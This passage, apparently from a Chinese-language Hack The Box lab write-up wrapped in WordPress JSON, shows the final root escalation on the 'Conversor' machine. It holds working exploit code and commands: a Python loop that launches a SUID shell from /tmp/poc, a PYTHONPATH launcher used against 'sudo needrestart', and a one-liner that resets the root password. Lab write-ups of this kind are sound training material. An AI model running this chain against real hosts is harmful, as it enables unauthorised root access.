True:\n    if os.path.exists(\"\/tmp\/poc\"):\n        print('Got the shell!')\n        os.system('\/tmp\/poc -p')\n        break\n    time.sleep(0.2)<\/code><\/pre>\n<p>\u4ee5\u53ca\u76d1\u542c\u5668\u542f\u52a8\u811a\u672c<code>exp.sh<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nset -e\nPYTHONPATH=\"$PWD\" python3 exp.py<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761484545757-1e8b8728-03fd-40ba-976e-21a29c504bdc.png\" alt=\"\" \/><\/p>\n<p>\u5c06<code>exp.sh<\/code>\u548c<code>exp.py<\/code>\u8d4b\u4e88\u6267\u884c\u6743\u9650\u540e\uff0c\u6267\u884c<code>exp.sh<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">.\/exp.sh<\/code><\/pre>\n<p>\u6700\u540e\u91cd\u65b0\u6253\u5f00\u4e00\u4e2a<code>SSH<\/code>\u8fde\u63a5\uff0c\u5728\u65b0\u6253\u5f00\u7684\u8fde\u63a5\u4e2d\u4f7f\u7528<code>needrestart<\/code>\u542f\u52a8\u670d\u52a1\u68c0\u67e5\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh fismathack@conversor.htb\nsudo needrestart<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761484745631-baedd7ae-adce-4651-b862-a45045e59344.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u6267\u884c<code>EUID<\/code>\u4e3a<code>root<\/code>\u7684<code>SUID Bash<\/code>\uff01\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u91cd\u7f6e<code>root<\/code>\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-shell\">python3 -c \"import os;os.setuid(0);os.setgid(0);os.system('passwd root')\"<\/code><\/pre>\n<p>\u968f\u540e\u5728\u65b0\u8fde\u63a5\u4e2d\u5207\u6362\u7528\u6237\u81f3<code>root<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">su -<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761485034609-7f59706f-c56f-42d4-98ef-e755cb83a9ab.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.219.14\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.129.118.205  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[19,14],"tags":[],"class_list":["post-328","post","type-post","status-publish","format-standard","hentry","category-htb_season_9","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/328","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=328"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions"}],"predecessor-version":[{"id":329,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions\/329"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=328"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}